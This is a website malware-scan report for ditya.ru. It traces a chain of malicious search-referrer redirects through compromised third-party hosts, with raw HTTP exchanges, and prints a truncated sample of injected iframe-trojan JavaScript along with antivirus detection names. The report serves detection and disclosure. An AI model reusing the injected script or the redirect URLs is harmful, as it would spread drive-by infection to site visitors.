New scan:

Malware Scanner report for ditya.ru

Malicious/Suspicious/Total urls checked
1/0/15
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "ditya.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://alfsystem.com.my/includes/domit/1.php
471 websites infected. alfsystem.com.my is marked by Yandex as suspicious.
->http://www.csra.de/includes/domit/1.php
346 websites infected.
->http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
56 websites infected.
->http://google.ru
42 websites infected.

The website "ditya.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ditya.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ditya.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://ditya.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: ditya.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 28 Jun 2014 10:27:12 GMT
Location: http://alfsystem.com.my/includes/domit/1.php
Server: nginx/1.2.1
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.3.13
malicious
URL: http://alfsystem.com.my/includes/domit/1.php
(imitation of visitor from search engine)


GET /includes/domit/1.php HTTP/1.1
Host: alfsystem.com.my
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://www.csra.de/includes/domit/1.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.3.23
malicious
URL: http://www.csra.de/includes/domit/1.php
(imitation of visitor from search engine)


GET /includes/domit/1.php HTTP/1.1
Host: www.csra.de
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
Server: Apache
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.4.29
malicious
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php
(imitation of visitor from search engine)


GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1
Host: jbtconsultinggroup.com
Referer: http://www.google.com/search?q=redirect+check4
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sat, 28 Jun 2014 10:27:13 GMT
Location: http://google.ru
Server: Apache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
malicious

Scanned pages/files

RequestServer responseStatus
http://ditya.ru/
200 OK
Content-Length: 23998
Content-Type: text/html
clean
http://ditya.ru/cache/template/js.php?id=904548fe50f1a3bf5e2bdf2b6db55378
200 OK
Content-Length: 86241
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=b5796c3d38edccdffd29d389a0d073d9
200 OK
Content-Length: 3638
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=67f2ab8d2469f0de9d16b01dff68cd13
200 OK
Content-Length: 83992
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=c9661bd88b851d91bb6b218452e811cb
200 OK
Content-Length: 825
Content-Type: application/x-javascript
clean
http://stg.odnoklassniki.ru/share/odkl_share.js
200 OK
Content-Length: 12312
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=6fbdc23a99e66aded74ec900a7877dd6
200 OK
Content-Length: 8761
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){function stripos(f_haystack,f_needle,f_offset){var haystack=(f_haystack+'').toLowerCase();var needle=(f_needle+'').toLowerCase();var index=0;if((index=haystack.indexOf(needle,f_offset))!==-1){return index;}
return false;}
function zzz_check_ua(){var blackList='Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0';blackList=blackList.split('|');va
... 7958 bytes are skipped ...
);$('div.headerbox div.deepest').matchHeight(20);$('div.topbox div.deepest').matchHeight(20);$('#bottom div.bottombox div.deepest').matchHeight(20);$('#bottom2 div.bottombox div.deepest').matchHeight(20);$('div.maintopbox div.deepest').matchHeight(20);$('div.mainbottombox div.deepest').matchHeight(20);$('div.contenttopbox div.deepest').matchHeight(20);$('div.contentbottombox div.deepest').matchHeight(20);$('#left, #right, #contentleft, #contentright').matchHeight(20);});;;;;;;;;;;;;;;;;;;;;;;;;;

Antivirus reports:

Avast
JS:Iframe-DVI [Trj]
Microsoft
Trojan:JS/Iframe.DI
Kaspersky
HEUR:Trojan.Script.Generic
NANO-Antivirus
Trojan.Script.Iframe.brqwio
VIPRE
Trojan.JS.IFrame.di (v)
Norman
Iframe.ZX

http://ditya.ru/templates/yoo_neo/warp/js/search.js
200 OK
Content-Length: 5493
Content-Type: application/x-javascript
clean
https://apis.google.com/js/plusone.js
200 OK
Content-Length: 11840
Content-Type: application/javascript
clean
http://userapi.com/js/api/openapi.js?18
200 OK
Content-Length: 64039
Content-Type: application/x-javascript
clean
http://ditya.ru/index.php/component/users/?view=reset
200 OK
Content-Length: 18468
Content-Type: text/html
clean
http://ditya.ru/cache/template/js.php?id=ced0b8895e47deadec3d4bbc1f0d7d2e
200 OK
Content-Length: 224400
Content-Type: application/x-javascript
clean
http://ditya.ru/cache/template/js.php?id=e22d7081f45d883c89e55f0847946a79
200 OK
Content-Length: 2630
Content-Type: application/x-javascript
clean
http://ditya.ru/index.php/component/users/
200 OK
Content-Length: 17338
Content-Type: text/html
clean
http://ditya.ru/index.php/component/users/?view=remind
200 OK
Content-Length: 18187
Content-Type: text/html
clean